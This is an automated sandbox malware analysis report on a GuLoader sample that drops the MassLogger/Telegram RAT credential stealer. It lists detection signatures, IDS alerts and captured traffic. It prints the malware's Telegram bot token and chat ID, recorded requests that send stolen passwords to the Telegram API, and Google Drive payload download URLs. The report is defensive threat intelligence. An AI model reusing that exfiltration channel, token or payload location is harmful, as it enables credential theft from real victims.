Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
14lVOjBoI2.exe

Overview

General Information

Sample name:14lVOjBoI2.exe
renamed because original name is a hash value
Original sample name:ad3b51ce98d8e69775168649d8b4ffbee80c182b3fdb6cfa7f964548c70e9e75.exe
Analysis ID:1588928
MD5:ebf8a74191898b4a5cd58ffe2035c1ee
SHA1:d73223724a73b0f7c3d0889247c50f97818ca4c0
SHA256:ad3b51ce98d8e69775168649d8b4ffbee80c182b3fdb6cfa7f964548c70e9e75
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 14lVOjBoI2.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\14lVOjBoI2.exe" MD5: EBF8A74191898B4A5CD58FFE2035C1EE)
    • 14lVOjBoI2.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\14lVOjBoI2.exe" MD5: EBF8A74191898B4A5CD58FFE2035C1EE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco", "Telegram Chatid": "6897585916"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2119760895.0000000002A1A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000005.00000002.2643645497.00000000017DA000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:20:28.673274+010020577441Malware Command and Control Activity Detected192.168.2.949713149.154.167.220443TCP
            2025-01-11T07:20:32.352743+010020577441Malware Command and Control Activity Detected192.168.2.949715149.154.167.220443TCP
            2025-01-11T07:20:33.907815+010020577441Malware Command and Control Activity Detected192.168.2.949717149.154.167.220443TCP
            2025-01-11T07:20:36.397639+010020577441Malware Command and Control Activity Detected192.168.2.949719149.154.167.220443TCP
            2025-01-11T07:20:37.992261+010020577441Malware Command and Control Activity Detected192.168.2.949721149.154.167.220443TCP
            2025-01-11T07:20:39.600046+010020577441Malware Command and Control Activity Detected192.168.2.949723149.154.167.220443TCP
            2025-01-11T07:20:41.250577+010020577441Malware Command and Control Activity Detected192.168.2.949725149.154.167.220443TCP
            2025-01-11T07:20:45.361029+010020577441Malware Command and Control Activity Detected192.168.2.949727149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:20:15.627680+010028032742Potentially Bad Traffic192.168.2.949711132.226.247.7380TCP
            2025-01-11T07:20:25.191376+010028032742Potentially Bad Traffic192.168.2.949711132.226.247.7380TCP
            2025-01-11T07:20:27.737418+010028032742Potentially Bad Traffic192.168.2.949711132.226.247.7380TCP
            2025-01-11T07:20:31.424576+010028032742Potentially Bad Traffic192.168.2.949714132.226.247.7380TCP
            2025-01-11T07:20:33.112153+010028032742Potentially Bad Traffic192.168.2.949716132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:20:01.715417+010028032702Potentially Bad Traffic192.168.2.949709142.250.185.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:20:28.407804+010018100081Potentially Bad Traffic192.168.2.949713149.154.167.220443TCP
            2025-01-11T07:20:32.009754+010018100081Potentially Bad Traffic192.168.2.949715149.154.167.220443TCP
            2025-01-11T07:20:33.688144+010018100081Potentially Bad Traffic192.168.2.949717149.154.167.220443TCP
            2025-01-11T07:20:36.194186+010018100081Potentially Bad Traffic192.168.2.949719149.154.167.220443TCP
            2025-01-11T07:20:37.707556+010018100081Potentially Bad Traffic192.168.2.949721149.154.167.220443TCP
            2025-01-11T07:20:39.294053+010018100081Potentially Bad Traffic192.168.2.949723149.154.167.220443TCP
            2025-01-11T07:20:40.942200+010018100081Potentially Bad Traffic192.168.2.949725149.154.167.220443TCP
            2025-01-11T07:20:45.052385+010018100081Potentially Bad Traffic192.168.2.949727149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco", "Telegram Chatid": "6897585916"}
            Source: 14lVOjBoI2.exe.8088.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendMessage"}
            Source: 14lVOjBoI2.exeReversingLabs: Detection: 55%
            Source: 14lVOjBoI2.exeVirustotal: Detection: 64%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7D1EC CryptUnprotectData,5_2_38D7D1EC
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_38D7D9D9 CryptUnprotectData,5_2_38D7D9D9
            Source: 14lVOjBoI2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49712 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: 14lVOjBoI2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D70671h5_2_38D703AF
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D71042h5_2_38D70C28
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7C985h5_2_38D7C638
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7F2F8h5_2_38D7F044
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7B339h5_2_38D7B07F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7C499h5_2_38D7C1F2
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7BBE9h5_2_38D7B930
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7DD40h5_2_38D7DA89
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7EEA0h5_2_38D7EBF4
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7E5F0h5_2_38D7E339
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7B791h5_2_38D7B4EC
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D71042h5_2_38D70C1B
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7C041h5_2_38D7BD88
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7E198h5_2_38D7DEE1
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D7EA48h5_2_38D7E790
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38D71042h5_2_38D70F6F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC6610h5_2_38DC6368
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then push 00000000h5_2_38DCBDF0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC882Dh5_2_38DC8650
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC91B7h5_2_38DC8650
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC1B00h5_2_38DC1858
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC7318h5_2_38DC7070
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC4ACAh5_2_38DC4820
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC2C60h5_2_38DC29B8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC23B0h5_2_38DC2108
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC5D60h5_2_38DC5AB8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC3510h5_2_38DC3268
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC54B0h5_2_38DC5208
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC4670h5_2_38DC43C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_38DC7B4F
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC3DC0h5_2_38DC3B18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC7770h5_2_38DC74C8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC1F58h5_2_38DC1CB0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC6EC0h5_2_38DC6C18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC16A8h5_2_38DC1400
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC5058h5_2_38DC4DB0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC2808h5_2_38DC2560
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC3968h5_2_38DC36C0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC5908h5_2_38DC5660
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC30B8h5_2_38DC2E10
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC6A68h5_2_38DC67C0
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC1250h5_2_38DC0FA8
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC4218h5_2_38DC3F70
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then jmp 38DC61B8h5_2_38DC5F10
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 4x nop then push 00000000h5_2_392CE5C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49725 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49717 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49723 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49727 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49717 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49727 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49721 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49725 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49721 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49723 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49715 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49715 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49713 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49713 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49719 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49719 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de218acfdcHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32068823f644Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3219f29a7316Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32385951acebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3248dfac04a0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32595b5c71f3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326b2a85fce9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de2b830c3eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49716 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49714 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49711 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 142.250.185.142:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49712 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de218acfdcHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
